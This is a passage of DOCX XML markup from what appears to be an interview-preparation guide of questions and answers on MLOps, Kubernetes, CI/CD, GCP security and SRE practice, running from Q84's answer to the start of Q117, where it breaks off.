        <w:t>A: Register every trained model with its version, training data reference, code commit, and evaluation metrics attached as metadata, and gate promotion from staging to production stages behind an explicit approval (automated threshold check, human sign-off, or both) rather than direct registration. Keep prior production versions in the registry so rollback is pointing the serving endpoint at a previous version, and ensure lineage links every deployed model back to the exact training run and data that produced it for audit purposes.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q85. Feature store: What production risks does a feature store solve, and how would you design feature freshness, parity, governance, and rollback?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: A feature store solves training/serving skew (features computed differently for training versus real-time inference) and duplicated feature engineering logic across teams. Design freshness with defined SLAs per feature (batch-updated daily versus streaming near-real-time), enforce parity by using the same feature computation code path for both training and serving, add governance via feature ownership and access control since features often contain sensitive data, and support rollback by versioning feature definitions so a bad feature change can be reverted without breaking dependent models.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q86. Batch vs real-time inference: How would you choose between batch inference, real-time inference, asynchronous inference, and streaming inference for different business use cases?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: Use batch inference when predictions are needed on a schedule and latency doesn't matter (nightly churn scoring); real-time inference when a user is waiting for a response (fraud check during checkout); asynchronous inference when the request can be queued and the result delivered later (document processing); and streaming inference when predictions need to update continuously as new events arrive (real-time anomaly detection on a data stream). The choice drives very different infrastructure - batch favors cost-efficient scheduled jobs, real-time demands low-latency always-on serving.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q87. A/B and canary for ML: How would you run A/B testing or canary deployment for an ML model while protecting users and measuring business impact?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: Start with a canary (small percentage of traffic) to catch outright failures or latency regressions before wider exposure, then run a proper A/B test with randomized, statistically sized cohorts to measure actual business impact (not just model accuracy) against the incumbent model. Define the success metric and minimum sample size before starting to avoid peeking bias, and always have a kill switch to revert to the previous model immediately if the new model shows harmful behavior mid-test.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q88. Model rollback: A newly deployed model has lower latency but worse business outcomes. How would you detect this and roll back safely?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: Detect it by monitoring business metrics (conversion, revenue, user engagement) alongside technical metrics, not just latency and accuracy, since a model can be technically healthy while quietly hurting the business. Roll back by repointing the serving endpoint to the previous registered model version - this should be a fast, low-risk operation if the registry and deployment pipeline were designed for it - and investigate offline why the new model underperformed on business outcomes despite passing technical evaluation before attempting to redeploy it.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q89. Reproducible training: How would you make an ML training pipeline reproducible across code version, data version, features, environment, and model artifact?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: Pin the code version (git commit), data version (a versioned dataset snapshot or a query with a fixed timestamp, not a live table), the exact feature computation logic, and the training environment (containerized with pinned dependency versions) for every run. Capture all of this as metadata alongside the resulting model artifact in the registry, so any past model version can be traced back to and, if needed, regenerated from the exact same inputs.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q90. Metadata management: What metadata would you capture for every ML run to support audit, rollback, debugging, and compliance?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: Capture the code commit, data version/snapshot reference, hyperparameters, training environment, evaluation metrics, the person or pipeline that triggered the run, and the resulting model artifact's location and hash. This metadata is what makes rollback safe (know exactly what you're rolling back to), debugging possible (reproduce the conditions that produced a bad model), and compliance auditable (prove what data and code produced a decision-making model).</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q91. Champion-challenger: How would you implement a champion-challenger model deployment pattern in production?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: Deploy the challenger model alongside the champion, routing a small, controlled percentage of live traffic to the challenger while the champion continues serving the majority, and log both models' predictions on the same requests where possible for direct comparison. Evaluate the challenger against the champion on the same business metrics over a defined period before promoting it to champion status, and keep the previous champion available to revert to instantly if the challenger underperforms once fully promoted.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q92. Kubernetes control plane: Explain what happens from kubectl apply to a running pod, including API server, scheduler, kubelet, CNI, and controllers.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: kubectl sends the manifest to the API server, which validates and persists it to etcd; a controller (e.g. Deployment controller) notices the new desired state and creates a Pod object; the scheduler watches for unscheduled pods and assigns one to a suitable node based on resource requests and constraints. The kubelet on that node sees the assignment, pulls the container image, and instructs the container runtime to start the containers, while the CNI plugin assigns the pod an IP and wires up networking so it can communicate within the cluster.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q93. StatefulSet vs Deployment: When would you use StatefulSet, Deployment, Job, CronJob, or DaemonSet in real Kubernetes platforms?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: Use Deployment for stateless, interchangeable replicas (most web services); StatefulSet when pods need stable network identity and persistent storage tied to a specific pod ordinal (databases, message queues); Job for a run-to-completion task; CronJob for scheduled recurring tasks; and DaemonSet when exactly one pod must run per node (log collectors, node-level monitoring agents). Choosing the wrong primitive - like using a Deployment for a database - typically causes data consistency or identity problems under scaling or rescheduling.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q94. CNI troubleshooting: Pods on different nodes cannot communicate. How would you debug CNI, routes, firewall rules, network policies, and node health?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: Start by checking whether the CNI plugin's pods (e.g. Calico, Cilium daemonset) are healthy on both nodes, since a CNI agent crash on one node breaks all pod networking there. Check node routing tables to confirm pod CIDR routes exist between nodes, verify no firewall rule is blocking the pod network CIDR range at the VPC level, check for a NetworkPolicy inadvertently blocking the traffic, and confirm the nodes themselves are Ready and not under network-affecting resource pressure.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q95. Pod affinity: When would you use node selectors, affinity, anti-affinity, topology spread constraints, taints, and tolerations?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: Use node selectors/affinity to require or prefer scheduling on nodes with specific characteristics (GPU nodes, a specific zone); anti-affinity to spread replicas apart so a single node or zone failure doesn't take down all instances of a service; topology spread constraints for more precise, weighted distribution across zones/nodes than affinity alone provides; and taints/tolerations to reserve nodes for specific workloads (GPU nodes tainted so only GPU pods schedule there) while keeping general workloads off them.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q96. Resource quotas: How would you design ResourceQuotas and LimitRanges for a shared cluster without blocking legitimate scaling?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: Set ResourceQuotas per namespace based on each team's actual expected usage plus reasonable headroom, reviewed periodically rather than set once and forgotten, and use LimitRanges to enforce sane default requests/limits so a pod deployed without explicit resource specs doesn't either starve or monopolize the node. Provide a clear, fast process for teams to request a quota increase when they have a legitimate scaling need, so the quota protects the cluster without becoming a bottleneck that teams route around.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q97. Helm rollback: A Helm upgrade failed and left resources in a partial state. How would you recover and prevent it next time?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: Use `helm rollback &lt;release&gt; &lt;revision&gt;` to revert to the last known-good release, then investigate what specifically failed (a bad values change, a resource that violates a policy, a hook failure) from the upgrade logs. Prevent recurrence by enabling `--atomic` on future upgrades so Helm automatically rolls back on failure instead of leaving a partial state, and add a pre-upgrade validation step (helm template + a policy check, or a dry-run against staging) before applying to production.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q98. DevOps lifecycle: Explain how you would design the full SDLC for a cloud-native service from code commit to production operations.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: Code is committed behind branch protection with required reviews, CI runs lint/test/build and produces an immutable versioned artifact, which is scanned for vulnerabilities before being promoted through environments (dev, staging, production) via the same artifact rather than rebuilding per stage. Deployment uses progressive delivery (canary or blue-green) with automated rollback on metric regression, and production operations close the loop with monitoring, alerting, on-call, and incident/postmortem processes that feed learnings back into the pipeline and codebase.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q99. Branching strategy: What Git branching and release strategy would you recommend for platform modules and application services?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: For application services with continuous deployment, trunk-based development with short-lived feature branches and feature flags for incomplete work usually moves fastest and avoids painful long-lived merge conflicts. For platform/Terraform modules consumed by many teams, use semantic versioning with release branches or tags so consumers can pin to a known-stable version and upgrade deliberately, since a breaking change in a shared module has a much larger blast radius than in a single application.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q100. Artifact promotion: How would you promote artifacts across environments without rebuilding and while preserving provenance?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: Build the artifact (container image, package) exactly once per commit with an immutable identifier, push it to a registry, and promote the same artifact through environments by updating a deployment reference (image tag/digest in a manifest) rather than triggering a new build per environment. Attach build provenance metadata (source commit, build system, signer) to the artifact so every environment can verify it's running exactly what was tested, not a rebuilt variant that could differ subtly.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q101. Secrets in CI/CD: How would you prevent secrets leakage in Jenkins, GitHub Actions, GitLab CI, and Cloud Build?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: Store secrets in each platform's native secret store (masked CI variables, or better, fetch from Secret Manager/Vault at runtime with short-lived credentials via OIDC) rather than hardcoding them in pipeline YAML or Jenkinsfiles. Ensure the CI platform masks secret values in logs automatically, restrict which branches/environments can access production secrets, and scan repositories and pipeline configs regularly for accidentally committed credentials.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q102. Deployment rollback criteria: What metrics and business signals should automatically stop or roll back a deployment?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: Automate rollback on clear technical regressions - error rate spike, latency p95/p99 breach, health check failures - and, where measurable in near-real-time, business signals like a sharp drop in conversion or checkout completion. Set thresholds based on statistical significance and a reasonable observation window (not the first data point) to avoid false-positive rollbacks from normal noise, and always allow a human override to halt an automated rollback if the team has context the automation doesn't.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q103. Infrastructure testing: How would you test Terraform modules, Kubernetes manifests, Helm charts, and policy-as-code before production?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: Test Terraform modules with `terraform validate`, `plan` review, and tools like Terratest that actually provision and verify resources in an ephemeral test environment. Validate Kubernetes manifests and Helm charts with `kubeval`/`kubeconform` for schema correctness and `helm template` plus a policy check (OPA/Conftest) to catch misconfigurations before they reach a cluster. Run all of this in CI on every change so infrastructure changes get the same test rigor as application code before merging.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q104. Disaster recovery testing: How would you design a DR test that proves backup, restore, DNS failover, application recovery, and stakeholder communication?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: Design the test to simulate the real failure mode as closely as possible - actually fail over DNS, actually restore from backup into a separate environment, actually bring the application up and verify it serves correct data - rather than checking each component in isolation and assuming they work together. Measure actual time-to-recovery against the target RTO/RPO, and include a communication dry-run (who gets notified, in what order) as part of the test, since a DR plan that only tests technical recovery misses half of what makes an incident go smoothly.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q105. Error budget policy: How would you create an error budget policy that balances feature velocity and reliability?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: Define the policy before it's needed, not during a crisis: when the error budget is healthy, teams can ship freely and take reasonable risks; as the budget depletes, require extra review or testing for risky changes; and when it's exhausted, freeze non-critical feature releases and redirect effort to reliability work until the budget recovers. Make the policy automatic and visible (a dashboard showing current budget status) so it's a shared, objective signal rather than a judgment call made under pressure.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q106. Capacity planning math: What inputs would you use to forecast GKE capacity for CPU, memory, network, storage, and regional failover?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: Use historical peak usage trends (not averages) per resource dimension, expected growth rate from product/business forecasts, and headroom for burst traffic and node failures (N+1 or N+2 capacity so losing a node doesn't cause cascading failures). For regional failover, plan capacity assuming a full region's traffic could shift to another region, which typically means each region needs meaningfully more spare capacity than its own steady-state load would suggest.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q107. Distributed tracing: A request crosses API gateway, Cloud Run, GKE, Pub/Sub, and Cloud SQL. How would you make tracing useful end to end?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: Propagate a single trace ID across every hop by instrumenting each service with OpenTelemetry and ensuring trace context headers are forwarded through synchronous calls and embedded in Pub/Sub message attributes for asynchronous hops (since trace context doesn't propagate automatically across a message queue). Export all spans to a single backend (Cloud Trace or an OTel collector feeding Jaeger/Tempo) so the full request path - including the async Pub/Sub leg - renders as one connected trace rather than disconnected fragments.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q108. Security baseline: What minimum security baseline would you enforce for every new GCP project?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: Enforce via org policy: no public IPs on VMs without explicit exception, Public Access Prevention on storage, required OS Login instead of SSH keys, restricted service account key creation (prefer Workload Identity), default-deny firewall with explicit allow rules, and mandatory audit logging enabled. Combine automated enforcement with a lightweight review for exceptions, so the baseline is consistent by default rather than dependent on every team remembering to configure it manually.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q109. WAF exceptions: A Cloud Armor WAF rule blocks legitimate traffic. How would you investigate, create exceptions, and avoid weakening security?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: Check Cloud Armor logs to see exactly which rule triggered and what request pattern matched, and confirm the traffic is genuinely legitimate (not an attacker who happens to resemble a false positive). Create a narrowly scoped exception - specific to the exact request pattern, source, or path rather than disabling the rule broadly - document why the exception exists and its expiry/review date, and monitor it afterward to confirm it isn't being abused as an unintended bypass.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q110. Vulnerability management: How would you run vulnerability management for containers, VMs, dependencies, and base images?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: Scan container images in CI before push and continuously in the registry (new CVEs are discovered after images are built), scan VM OS packages and dependencies with a tool integrated into the patching workflow, and track base image freshness since an outdated base image is a common source of accumulating vulnerabilities. Prioritize remediation by actual exploitability and exposure (internet-facing critical vulnerabilities first) rather than raw CVE count, and set SLAs by severity that are actually enforced and tracked to closure.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q111. Network segmentation: How would you segment environments and teams using VPCs, Shared VPC, firewall rules, folders, and projects?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: Separate environments (dev/staging/prod) into different projects or at minimum different VPCs/subnets so a misconfiguration in dev cannot reach production, and use Shared VPC with service projects so teams get network isolation for their workloads while networking stays centrally governed. Apply firewall rules based on tags/service accounts rather than broad IP ranges, and use folder-level IAM and org policies so new projects inherit segmentation and guardrails by default.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q112. MTU issue: An application has intermittent failures over VPN or interconnect due to packet size. How would you identify and fix MTU problems?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: Look for symptoms like large packets failing while small ones succeed, or TLS handshakes hanging - classic signs of an MTU mismatch causing fragmentation issues, especially over VPN tunnels which add overhead and reduce the effective MTU. Test with `ping -M do -s &lt;size&gt;` (or equivalent) to find the actual path MTU, and fix it by lowering the interface/tunnel MTU to match the path's actual capacity or enabling TCP MSS clamping so TCP negotiates a safe segment size automatically.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q113. REST API automation: How would you design a REST API that allows teams to request infrastructure safely?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: Design the API around explicit, validated resource requests (not arbitrary Terraform execution) with schema validation, quota checks, and policy checks applied before provisioning, and require the request to go through an approval step for anything above a defined risk threshold. Log every request and its outcome for audit, return clear errors when a request is rejected so users understand why, and version the API so you can evolve capabilities without breaking existing automation built on top of it.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q114. Stakeholder tradeoff: Product wants faster releases, security wants stricter gates, and SRE wants fewer incidents. How would you align them?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: Reframe the conversation around shared outcomes rather than competing priorities - faster releases, fewer incidents, and strong security are not fundamentally opposed if the release process itself is safer (progressive delivery, automated gates, good observability) rather than slower. Use data (error budgets, incident trends, security findings) to make tradeoffs explicit and objective, and negotiate specific, time-boxed agreements (e.g. security gates automated within a quarter in exchange for faster manual review today) rather than a permanent standoff.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q115. Resume deep-dive - GitHub to Bitbucket migration: You led a GitHub-to-Bitbucket migration that improved engineering productivity by 30 percent. How did you plan the migration, handle CI/CD and webhook changes, and minimize disruption?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: Planning started with an inventory of every repository, webhook, branch protection rule, and CI/CD integration pointing at GitHub, since missing one silently breaks a pipeline after cutover. Migrated repositories in batches (not a big-bang cutover), rebuilt webhook and CI/CD integrations (Jenkins/GitHub Actions equivalents) on Bitbucket before switching teams over, and ran both systems in parallel briefly so teams could validate before GitHub was decommissioned, which minimized disruption and let the migration be rolled back per-team if something broke.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q116. Resume deep-dive - enterprise CI/CD: You built CI/CD platforms with Jenkins, GitHub Actions, Terraform, Docker, Kubernetes, Helm, and Ansible. How did you standardize pipelines across many application teams with different tech stacks?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: Standardized on shared, reusable pipeline templates (Jenkins shared libraries or reusable GitHub Actions workflows) that handled the common stages - build, test, security scan, deploy - with clearly defined extension points for language/framework-specific steps, so teams didn't each write CI logic from scratch. This let teams with different stacks (Java, Python, Node) use the same pipeline skeleton while customizing only the parts that genuinely needed to differ, which cut onboarding time for new services significantly and made platform-wide changes (like adding a new security scan) a one-time update instead of N team-by-team changes.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q117. Resume deep-dive - multi-cloud IaC: You delivered Terraform and Ansible IaC across GCP, AWS, and Azure. What did you do differently for state management, provider versioning, and secrets across three clouds?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
